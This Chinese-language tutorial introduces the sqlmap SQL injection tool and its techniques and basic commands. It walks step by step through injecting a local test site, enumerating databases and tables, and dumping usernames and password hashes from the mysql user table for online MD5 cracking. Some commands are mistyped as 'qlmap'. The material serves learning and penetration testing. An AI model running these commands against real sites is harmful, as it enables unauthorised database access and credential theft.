介绍
sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞
SQLMap采用了以下5种独特的SQL注入技术。
- 基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入。
- 基于时间的盲注,即不能根据页面返回的内容判断任何信息,要用条件语句查看时间延迟语句是否已执行(即页面返回时间是否增加)来判断。
- 基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回到页面中。
- 联合查询注入,在可以使用Union的情况下的注入。
- 堆查询注入,可以同时执行多条语句时的注入。
SQLMap的强大的功能包括数据库指纹识别、数据库枚举、数据提取、访问目标文件系统,并在获取完全的操作权限时实行任意命令。SQLMap的功能强大到让人惊叹,当常规的注入工具不能利用SQL注入漏洞进行注入时,使用SQLMap会有意想不到的效果
基本命令
sqlmap -u URL 检查注入点
qlmap -u URL --dbs 列出数据库的名字
qlmap -u URL --is-dba 当前用户是否是数据库管理员
qlmap -u URL --current-db 显示当前数据库的名字-D 指定数据库
--tables 列出所有表名
qlmap -u URL -D "xx" --tables 列出xx数据库中的所有表-T 指定一个表
--columns 列出所有的字段名
qlmap -u URL -D "xx" -T "cc" --columns 列出表中所有的字段名-C 指定一个字段名
--dump 列出字段内容
qlmap -u URL -D "xx" -T "cc" -C "x,x,.." --dump 列出字段内容
栗子
对本地的网站 http://192.168.1.8/cms/show.php?id=33进行sql注入,(我先用safe3 Web扫描工具扫出了其存在sql注入漏洞)
1.检测注入点
.
中间有三次提示让你输yes或者no,直接输yes就好了。
说明可以注入
2.爆出数据库的名字
sqlmap -u http://192.168.1.8/cms/show.php?id=33 --dbs
3.指定数据库名,爆所有的表
sqlmap -u http://192.168.1.8/cms/show.php?id=33 -D mysql --tables
上面就是mysql中所有的表
4.指定表名,列出所有的字段名
sqlmap -u http://192.168.1.8/cms/show.php?id=33 -D mysql -T user --columns
5. 指定字段名列出数据
sqlmap -u http://192.168.1.8/cms/show.php?id=33 -D mysql -T user -C "user,password" --dump
password字段中的数据为md5加密,我们可以去在线解密 www.cmd5.com
